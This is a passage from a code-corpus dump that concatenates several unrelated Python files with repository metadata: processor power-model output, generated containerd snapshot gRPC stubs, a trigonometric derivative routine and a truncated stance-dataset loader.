'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.108759,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.239052,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 4.36207,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 5.941599439234633,
'Runtime Dynamic': 5.941599439234633,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.257617,
'Runtime Dynamic': 0.1778,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 80.0936,
'Peak Power': 113.206,
'Runtime Dynamic': 18.3295,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 79.836,
'Total Cores/Runtime Dynamic': 18.1517,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.257617,
'Total L3s/Runtime Dynamic': 0.1778,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}} | 75.063457 | 124 | 0.682078 | 8,082 | 68,608 | 5.784212 | 0.067805 | 0.123556 | 0.112946 | 0.093437 | 0.939698 | 0.931206 | 0.917815 | 0.88699 | 0.862753 | 0.842239 | 0 | 0.131932 | 0.224332 | 68,608 | 914 | 125 | 75.063457 | 0.74651 | 0 | 0 | 0.642232 | 0 | 0 | 0.657421 | 0.048099 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
eda1793cde5677e1866b3ff2ec5898a029a7b3bc | 82 | py | Python | Function_Programs/max.py | saratkumar17mss040/Python-lab-programs | a2faa190acaaa30d92d4c801fd53fdc668c3c394 | [
"MIT"
] | 3 | 2020-08-26T15:29:18.000Z | 2020-09-03T13:49:13.000Z | Function_Programs/max.py | saratkumar17mss040/Python-lab-programs | a2faa190acaaa30d92d4c801fd53fdc668c3c394 | [
"MIT"
] | null | null | null | Function_Programs/max.py | saratkumar17mss040/Python-lab-programs | a2faa190acaaa30d92d4c801fd53fdc668c3c394 | [
"MIT"
] | null | null | null | def big(num1, num2, num3):
return max(num1, num2, num3)
print(big(1,2,3)) | 20.5 | 32 | 0.609756 | 15 | 82 | 3.333333 | 0.733333 | 0.32 | 0.48 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.138462 | 0.207317 | 82 | 4 | 33 | 20.5 | 0.630769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0.333333 | 0.666667 | 0.333333 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
edb285b31a0e486c544d78c914a6ed9ace6a5e84 | 120 | py | Python | example_python_package_Blitan/__init__.py | Blitan/example_python_package_Blitan | 79719cb8a705882799e9e2b0ec382094283ced6c | [
"MIT"
] | 2 | 2021-06-09T12:22:24.000Z | 2021-06-10T16:19:07.000Z | example_python_package_Blitan/__init__.py | Blitan/example_python_package_Blitan | 79719cb8a705882799e9e2b0ec382094283ced6c | [
"MIT"
] | 3 | 2021-06-09T11:35:15.000Z | 2021-06-22T10:27:23.000Z | example_python_package_Blitan/__init__.py | Blitan/example_python_package_Blitan | 79719cb8a705882799e9e2b0ec382094283ced6c | [
"MIT"
] | null | null | null |
from .core import my_name
from .core import add
from .core import minus
from .core import multi
from .core import div
| 17.142857 | 25 | 0.775 | 21 | 120 | 4.380952 | 0.428571 | 0.434783 | 0.76087 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.183333 | 120 | 6 | 26 | 20 | 0.938776 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
eddbc9e99d798d68629db6f7ba9de3f202efdbae | 9,633 | py | Python | api_1.3/containerd/services/snapshots/v1/snapshots_pb2_grpc.py | Silvanoc/pycontainerd | 7245ce623d978f65cd8a4cf0d685a3318640a305 | [
"Apache-2.0"
] | null | null | null | api_1.3/containerd/services/snapshots/v1/snapshots_pb2_grpc.py | Silvanoc/pycontainerd | 7245ce623d978f65cd8a4cf0d685a3318640a305 | [
"Apache-2.0"
] | null | null | null | api_1.3/containerd/services/snapshots/v1/snapshots_pb2_grpc.py | Silvanoc/pycontainerd | 7245ce623d978f65cd8a4cf0d685a3318640a305 | [
"Apache-2.0"
] | null | null | null | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from containerd.services.snapshots.v1 import snapshots_pb2 as containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2
from containerd.vendor.google.protobuf import empty_pb2 as containerd_dot_vendor_dot_google_dot_protobuf_dot_empty__pb2
class SnapshotsStub(object):
"""Snapshot service manages snapshots
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.Prepare = channel.unary_unary(
'/containerd.services.snapshots.v1.Snapshots/Prepare',
request_serializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.PrepareSnapshotRequest.SerializeToString,
response_deserializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.PrepareSnapshotResponse.FromString,
)
self.View = channel.unary_unary(
'/containerd.services.snapshots.v1.Snapshots/View',
request_serializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.ViewSnapshotRequest.SerializeToString,
response_deserializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.ViewSnapshotResponse.FromString,
)
self.Mounts = channel.unary_unary(
'/containerd.services.snapshots.v1.Snapshots/Mounts',
request_serializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.MountsRequest.SerializeToString,
response_deserializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.MountsResponse.FromString,
)
self.Commit = channel.unary_unary(
'/containerd.services.snapshots.v1.Snapshots/Commit',
request_serializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.CommitSnapshotRequest.SerializeToString,
response_deserializer=containerd_dot_vendor_dot_google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.Remove = channel.unary_unary(
'/containerd.services.snapshots.v1.Snapshots/Remove',
request_serializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.RemoveSnapshotRequest.SerializeToString,
response_deserializer=containerd_dot_vendor_dot_google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.Stat = channel.unary_unary(
'/containerd.services.snapshots.v1.Snapshots/Stat',
request_serializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.StatSnapshotRequest.SerializeToString,
response_deserializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.StatSnapshotResponse.FromString,
)
self.Update = channel.unary_unary(
'/containerd.services.snapshots.v1.Snapshots/Update',
request_serializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.UpdateSnapshotRequest.SerializeToString,
response_deserializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.UpdateSnapshotResponse.FromString,
)
self.List = channel.unary_stream(
'/containerd.services.snapshots.v1.Snapshots/List',
request_serializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.ListSnapshotsRequest.SerializeToString,
response_deserializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.ListSnapshotsResponse.FromString,
)
self.Usage = channel.unary_unary(
'/containerd.services.snapshots.v1.Snapshots/Usage',
request_serializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.UsageRequest.SerializeToString,
response_deserializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.UsageResponse.FromString,
)
class SnapshotsServicer(object):
"""Snapshot service manages snapshots
"""
def Prepare(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def View(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Mounts(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Commit(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Remove(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Stat(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Update(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def List(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Usage(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_SnapshotsServicer_to_server(servicer, server):
rpc_method_handlers = {
'Prepare': grpc.unary_unary_rpc_method_handler(
servicer.Prepare,
request_deserializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.PrepareSnapshotRequest.FromString,
response_serializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.PrepareSnapshotResponse.SerializeToString,
),
'View': grpc.unary_unary_rpc_method_handler(
servicer.View,
request_deserializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.ViewSnapshotRequest.FromString,
response_serializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.ViewSnapshotResponse.SerializeToString,
),
'Mounts': grpc.unary_unary_rpc_method_handler(
servicer.Mounts,
request_deserializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.MountsRequest.FromString,
response_serializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.MountsResponse.SerializeToString,
),
'Commit': grpc.unary_unary_rpc_method_handler(
servicer.Commit,
request_deserializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.CommitSnapshotRequest.FromString,
response_serializer=containerd_dot_vendor_dot_google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'Remove': grpc.unary_unary_rpc_method_handler(
servicer.Remove,
request_deserializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.RemoveSnapshotRequest.FromString,
response_serializer=containerd_dot_vendor_dot_google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'Stat': grpc.unary_unary_rpc_method_handler(
servicer.Stat,
request_deserializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.StatSnapshotRequest.FromString,
response_serializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.StatSnapshotResponse.SerializeToString,
),
'Update': grpc.unary_unary_rpc_method_handler(
servicer.Update,
request_deserializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.UpdateSnapshotRequest.FromString,
response_serializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.UpdateSnapshotResponse.SerializeToString,
),
'List': grpc.unary_stream_rpc_method_handler(
servicer.List,
request_deserializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.ListSnapshotsRequest.FromString,
response_serializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.ListSnapshotsResponse.SerializeToString,
),
'Usage': grpc.unary_unary_rpc_method_handler(
servicer.Usage,
request_deserializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.UsageRequest.FromString,
response_serializer=containerd_dot_services_dot_snapshots_dot_v1_dot_snapshots__pb2.UsageResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'containerd.services.snapshots.v1.Snapshots', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
| 52.353261 | 136 | 0.797363 | 1,061 | 9,633 | 6.768143 | 0.091423 | 0.110291 | 0.096505 | 0.110291 | 0.869935 | 0.859351 | 0.848211 | 0.805877 | 0.744604 | 0.744604 | 0 | 0.010114 | 0.137859 | 9,633 | 183 | 137 | 52.639344 | 0.854545 | 0.072148 | 0 | 0.333333 | 1 | 0 | 0.106517 | 0.054607 | 0 | 0 | 0 | 0 | 0 | 1 | 0.07483 | false | 0.061224 | 0.020408 | 0 | 0.108844 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
ede1cc368d981c4cb2d544de102b4d86f48a86f5 | 8,845 | py | Python | QIIDderivative/term4.py | avanteijlingen/lipid-md | 825c7bc982bc920a24e64e272354a7317eac9cbd | [
"MIT"
] | 2 | 2020-11-02T14:55:31.000Z | 2021-05-04T05:12:14.000Z | QIIDderivative/term4.py | avanteijlingen/lipid-md | 825c7bc982bc920a24e64e272354a7317eac9cbd | [
"MIT"
] | null | null | null | QIIDderivative/term4.py | avanteijlingen/lipid-md | 825c7bc982bc920a24e64e272354a7317eac9cbd | [
"MIT"
] | 1 | 2020-11-02T16:35:21.000Z | 2020-11-02T16:35:21.000Z | # -*- coding: utf-8 -*-
"""
author: Chris Brasnett, University of Bristol, christopher.brasnett@bristol.ac.uk
"""
import numpy as np
import math
pi=math.pi
def term4(x,y,z,m):
#t4_x
cg = (-6 * pi * m * math.sin(3 * pi * m * x) * math.cos(pi * m * y) * math.cos(3 * pi * m * z) -
6 * math.cos(3 * pi * m * y) * math.cos(pi * m * z) * pi * m * math.sin(3 * pi * m * x) -
2 * math.cos(3 * pi * m * z) * pi * m * math.sin(pi * m * x) * math.cos(3 * pi * m * y) +
6 * pi * m * math.cos(3 * pi * m * x) * math.cos(pi * m * y) * math.sin(3 * pi * m * z) +
6 * math.sin(3 * pi * m * y) * math.cos(pi * m * z) * pi * m * math.cos(3 * pi * m * x) -
2 * math.sin(3 * pi * m * z) * pi * m * math.sin(pi * m * x) * math.sin(3 * pi * m * y) -
6 * pi * m * math.cos(3 * pi * m * x) * math.sin(pi * m * y) * math.cos(3 * pi * m * z) +
6 * math.sin(3 * pi * m * y) * math.sin(pi * m * z) * pi * m * math.sin(3 * pi * m * x) -
2 * math.sin(3 * pi * m * z) * pi * m * math.cos(pi * m * x) * math.cos(3 * pi * m * y))
#t4_y
cg0 = (-2 * pi * m * math.cos(3 * pi * m * x) * math.sin(pi * m * y) * math.cos(3 * pi * m * z) -
6 * math.sin(3 * pi * m * y) * math.cos(pi * m * z) * pi * m * math.cos(3 * pi * m * x) -
6 * math.cos(3 * pi * m * z) * math.cos(pi * m * x) * pi * m * math.sin(3 * pi * m * y) -
2 * math.sin(3 * pi * m * x) * pi * m * math.sin(pi * m * y) * math.sin(3 * pi * m * z) +
6 * math.cos(3 * pi * m * y) * math.cos(pi * m * z) * pi * m * math.sin(3 * pi * m * x) +
6 * math.sin(3 * pi * m * z) * pi * m * math.cos(pi * m * x) * math.cos(3 * pi * m * y) -
2 * pi * m * math.sin(3 * pi * m * x) * math.cos(pi * m * y) * math.cos(3 * pi * m * z) -
6 * pi * m * math.cos(3 * pi * m * y) * math.sin(pi * m * z) * math.cos(3 * pi * m * x) +
6 * math.sin(3 * pi * m * z) * pi * m * math.sin(pi * m * x) * math.sin(3 * pi * m * y))
#t4_z
cg1 = (-6 * pi * m * math.cos(3 * pi * m * x) * math.cos(pi * m * y) * math.sin(3 * pi * m * z) -
2 * pi * m * math.cos(3 * pi * m * y) * math.sin(pi * m * z) * math.cos(3 * pi * m * x) -
6 * math.sin(3 * pi * m * z) * pi * m * math.cos(pi * m * x) * math.cos(3 * pi * m * y) +
6 * pi * m * math.sin(3 * pi * m * x) * math.cos(pi * m * y) * math.cos(3 * pi * m * z) -
2 * math.sin(3 * pi * m * y) * math.sin(pi * m * z) * pi * m * math.sin(3 * pi * m * x) +
6 * math.cos(3 * pi * m * z) * math.cos(pi * m * x) * pi * m * math.sin(3 * pi * m * y) +
6 * math.sin(3 * pi * m * x) * pi * m * math.sin(pi * m * y) * math.sin(3 * pi * m * z) -
2 * math.sin(3 * pi * m * y) * math.cos(pi * m * z) * pi * m * math.cos(3 * pi * m * x) -
6 * math.cos(3 * pi * m * z) * pi * m * math.sin(pi * m * x) * math.cos(3 * pi * m * y))
#t4_xx
cg2 = (-18 * pi ** 2 * m ** 2 * math.cos(3 * pi * m * x) * math.cos(pi * m * y) * math.cos(3 * pi * m * z) -
18 * math.cos(3 * pi * m * y) * math.cos(pi * m * z) * pi ** 2 * m ** 2 * math.cos(3 * pi * m * x) -
2 * math.cos(3 * pi * m * z) * pi ** 2 * m ** 2 * math.cos(pi * m * x) * math.cos(3 * pi * m * y) -
18 * pi ** 2 * m ** 2 * math.sin(3 * pi * m * x) * math.cos(pi * m * y) * math.sin(3 * pi * m * z) -
18 * math.sin(3 * pi * m * y) * math.cos(pi * m * z) * pi ** 2 * m ** 2 * math.sin(3 * pi * m * x) -
2 * math.sin(3 * pi * m * z) * pi ** 2 * m ** 2 * math.cos(pi * m * x) * math.sin(3 * pi * m * y) +
18 * pi ** 2 * m ** 2 * math.sin(3 * pi * m * x) * math.sin(pi * m * y) * math.cos(3 * pi * m * z) +
18 * math.sin(3 * pi * m * y) * math.sin(pi * m * z) * pi ** 2 * m ** 2 * math.cos(3 * pi * m * x) +
2 * math.sin(3 * pi * m * z) * pi ** 2 * m ** 2 * math.sin(pi * m * x) * math.cos(3 * pi * m * y))
#t4_xy
cg3 = (6 * pi ** 2 * m ** 2 * math.sin(3 * pi * m * x) * math.sin(pi * m * y) * math.cos(3 * pi * m * z) +
18 * math.sin(3 * pi * m * y) * math.cos(pi * m * z) * pi ** 2 * m ** 2 * math.sin(3 * pi * m * x) +
6 * math.cos(3 * pi * m * z) * pi ** 2 * m ** 2 * math.sin(pi * m * x) * math.sin(3 * pi * m * y) -
6 * pi ** 2 * m ** 2 * math.cos(3 * pi * m * x) * math.sin(pi * m * y) * math.sin(3 * pi * m * z) +
18 * math.cos(3 * pi * m * y) * math.cos(pi * m * z) * pi ** 2 * m ** 2 * math.cos(3 * pi * m * x) -
6 * math.sin(3 * pi * m * z) * pi ** 2 * m ** 2 * math.sin(pi * m * x) * math.cos(3 * pi * m * y) -
6 * pi ** 2 * m ** 2 * math.cos(3 * pi * m * x) * math.cos(pi * m * y) * math.cos(3 * pi * m * z) +
18 * pi ** 2 * m ** 2 * math.cos(3 * pi * m * y) * math.sin(pi * m * z) * math.sin(3 * pi * m * x) +
6 * math.sin(3 * pi * m * z) * pi ** 2 * m ** 2 * math.cos(pi * m * x) * math.sin(3 * pi * m * y))
#t4_yy
cg4 = (-2 * pi ** 2 * m ** 2 * math.cos(3 * pi * m * x) * math.cos(pi * m * y) * math.cos(3 * pi * m * z) -
18 * math.cos(3 * pi * m * y) * math.cos(pi * m * z) * pi ** 2 * m ** 2 * math.cos(3 * pi * m * x) -
18 * math.cos(3 * pi * m * z) * pi ** 2 * m ** 2 * math.cos(pi * m * x) * math.cos(3 * pi * m * y) -
2 * pi ** 2 * m ** 2 * math.sin(3 * pi * m * x) * math.cos(pi * m * y) * math.sin(3 * pi * m * z) -
18 * math.sin(3 * pi * m * y) * math.cos(pi * m * z) * pi ** 2 * m ** 2 * math.sin(3 * pi * m * x) -
18 * math.sin(3 * pi * m * z) * pi ** 2 * m ** 2 * math.cos(pi * m * x) * math.sin(3 * pi * m * y) +
2 * pi ** 2 * m ** 2 * math.sin(3 * pi * m * x) * math.sin(pi * m * y) * math.cos(3 * pi * m * z) +
18 * math.sin(3 * pi * m * y) * math.sin(pi * m * z) * pi ** 2 * m ** 2 * math.cos(3 * pi * m * x) +
18 * math.sin(3 * pi * m * z) * pi ** 2 * m ** 2 * math.sin(pi * m * x) * math.cos(3 * pi * m * y))
#t4_yz
cg5 = (6 * pi ** 2 * m ** 2 * math.cos(3 * pi * m * x) * math.sin(pi * m * y) * math.sin(3 * pi * m * z) +
6 * math.sin(3 * pi * m * y) * math.sin(pi * m * z) * pi ** 2 * m ** 2 * math.cos(3 * pi * m * x) +
18 * math.sin(3 * pi * m * z) * pi ** 2 * m ** 2 * math.cos(pi * m * x) * math.sin(3 * pi * m * y) -
6 * pi ** 2 * m ** 2 * math.sin(3 * pi * m * x) * math.sin(pi * m * y) * math.cos(3 * pi * m * z) -
6 * pi ** 2 * m ** 2 * math.cos(3 * pi * m * y) * math.sin(pi * m * z) * math.sin(3 * pi * m * x) +
18 * math.cos(3 * pi * m * z) * pi ** 2 * m ** 2 * math.cos(pi * m * x) * math.cos(3 * pi * m * y) +
6 * pi ** 2 * m ** 2 * math.sin(3 * pi * m * x) * math.cos(pi * m * y) * math.sin(3 * pi * m * z) -
6 * math.cos(3 * pi * m * y) * math.cos(pi * m * z) * pi ** 2 * m ** 2 * math.cos(3 * pi * m * x) +
18 * math.cos(3 * pi * m * z) * pi ** 2 * m ** 2 * math.sin(pi * m * x) * math.sin(3 * pi * m * y))
#t4_zz
cg6 = (-18 * pi ** 2 * m ** 2 * math.cos(3 * pi * m * x) * math.cos(pi * m * y) * math.cos(3 * pi * m * z) -
2 * math.cos(3 * pi * m * y) * math.cos(pi * m * z) * pi ** 2 * m ** 2 * math.cos(3 * pi * m * x) -
18 * math.cos(3 * pi * m * z) * pi ** 2 * m ** 2 * math.cos(pi * m * x) * math.cos(3 * pi * m * y) -
18 * pi ** 2 * m ** 2 * math.sin(3 * pi * m * x) * math.cos(pi * m * y) * math.sin(3 * pi * m * z) -
2 * math.sin(3 * pi * m * y) * math.cos(pi * m * z) * pi ** 2 * m ** 2 * math.sin(3 * pi * m * x) -
18 * math.sin(3 * pi * m * z) * pi ** 2 * m ** 2 * math.cos(pi * m * x) * math.sin(3 * pi * m * y) +
18 * pi ** 2 * m ** 2 * math.sin(3 * pi * m * x) * math.sin(pi * m * y) * math.cos(3 * pi * m * z) +
2 * math.sin(3 * pi * m * y) * math.sin(pi * m * z) * pi ** 2 * m ** 2 * math.cos(3 * pi * m * x) +
18 * math.sin(3 * pi * m * z) * pi ** 2 * m ** 2 * math.sin(pi * m * x) * math.cos(3 * pi * m * y))
#t4_xz
cg7 = (18 * pi ** 2 * m ** 2 * math.sin(3 * pi * m * x) * math.cos(pi * m * y) * math.sin(3 * pi * m * z) +
6 * math.cos(3 * pi * m * y) * pi ** 2 * m ** 2 * math.sin(pi * m * z) * math.sin(3 * pi * m * x) +
6 * math.sin(3 * pi * m * z) * pi ** 2 * m ** 2 * math.sin(pi * m * x) * math.cos(3 * pi * m * y) +
18 * pi ** 2 * m ** 2 * math.cos(3 * pi * m * x) * math.cos(pi * m * y) * math.cos(3 * pi * m * z) -
6 * math.sin(3 * pi * m * y) * pi ** 2 * m ** 2 * math.sin(pi * m * z) * math.cos(3 * pi * m * x) -
6 * math.cos(3 * pi * m * z) * pi ** 2 * m ** 2 * math.sin(pi * m * x) * math.sin(3 * pi * m * y))
return np.array([cg,cg0,cg1,cg2,cg3,cg4,cg5,cg6,cg7]) | 81.898148 | 113 | 0.384398 | 1,730 | 8,845 | 1.960116 | 0.027746 | 0.230905 | 0.184017 | 0.230021 | 0.939546 | 0.939546 | 0.939251 | 0.938661 | 0.938366 | 0.938366 | 0 | 0.071063 | 0.381119 | 8,845 | 108 | 114 | 81.898148 | 0.548411 | 0.016959 | 0 | 0.228916 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.012048 | false | 0 | 0.024096 | 0 | 0.048193 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
612cd9c1dd720b25127f527f65fbd77ee6415316 | 13,648 | py | Python | Dataset_New.py | zijie2333/tensorflow_neural_collaborative_filtering | 736b3f2f798457a1a2ef53e00d2549ddb5677f89 | [
"Apache-2.0"
] | null | null | null | Dataset_New.py | zijie2333/tensorflow_neural_collaborative_filtering | 736b3f2f798457a1a2ef53e00d2549ddb5677f89 | [
"Apache-2.0"
] | null | null | null | Dataset_New.py | zijie2333/tensorflow_neural_collaborative_filtering | 736b3f2f798457a1a2ef53e00d2549ddb5677f89 | [
"Apache-2.0"
] | 1 | 2018-12-27T03:34:22.000Z | 2018-12-27T03:34:22.000Z | '''
Created on Aug 8, 2016
Processing datasets.
@author: Zijie Huang
'''
import scipy.sparse as sp
import numpy as np
####For grouped friendship....friends are index.
class Dataset_New(object):
def __init__(self, args):
'''
Constructor
'''
self.num_items = args.num_items
self.num_classes = args.num_classes
self.num_users = args.num_users
Train_data = args.path + args.dataset + "/Train_Athesim_5_Renumbered_000_own.txt"
Test_data = args.path + args.dataset+ "/Test_Athesim_5_Renumbered_000_own.txt"
self.largest_friends_number = self.Find_largest_friends_number(Train_data,Test_data)
self.train_users, self.train_items, self.train_labels, self.train_isintargets,self.train_weights = self.load_train_file_as_numpy(
Train_data,self.largest_friends_number)
self.test_users, self.test_labels, self.test_isintargets,self.test_weights= self.load_test_file_as_numpy(
Test_data,self.largest_friends_number)
self.t_train_users, self.t_train_labels, self.t_train_isintargets,self.t_train_weights = self.load_test_file_as_numpy(
Train_data,self.largest_friends_number)
def Find_largest_friends_number(self,Train_data,Test_data):
largest_friends_number=0
for filename in [Train_data,Test_data]:
with open(filename,'r') as f:
for line in f:
if len(line)<3:
continue
line = line.rstrip("\r\n")
arr = line.split("\t")
friends=arr[3].split(":")
if len(friends[2:])==0:
continue ##no friends
largest_friends_number=max(largest_friends_number,len(friends[2:]))
print("Largest friends number is %d"%largest_friends_number)
return largest_friends_number
def convert_stances(self, stance):
#convert stance into np.array of shape [1]
stance_ID=np.zeros(1,dtype="int32")
if stance == 'NONE':
stance_ID[0] = 0
elif stance == 'AGAINST':
stance_ID[0]= 1
elif stance == 'FAVOR':
stance_ID[0] = 2
return stance_ID
def load_train_file_as_numpy(self, filename, largest_friends_number): #original_num*3
labels = []
users = []
items = []
user_weights=[]
isintargets = []
total_users=set()
total_tweet=list()
favor,against,none=0,0,0
with open(filename, "r") as f:
for line in f:
if len(line)<3:
continue
line = line.rstrip("\r\n")
arr = line.split("\t")
friends=arr[3].split(":")
if len(friends[2:])==0:
continue ##no friends
user_friends = []
user = arr[2]
if user in total_users: #if user in total_users: # use only the first stance of a user.
continue
total_users.add(user)
total_tweet.append(user)
##padding friendship.
for friend in friends[2:]:
friend_ID = int(friend)
user_friends.append(int(friend_ID-1))
if len(user_friends) != largest_friends_number:
padding = np.zeros(largest_friends_number - len(user_friends), dtype='int32').tolist()
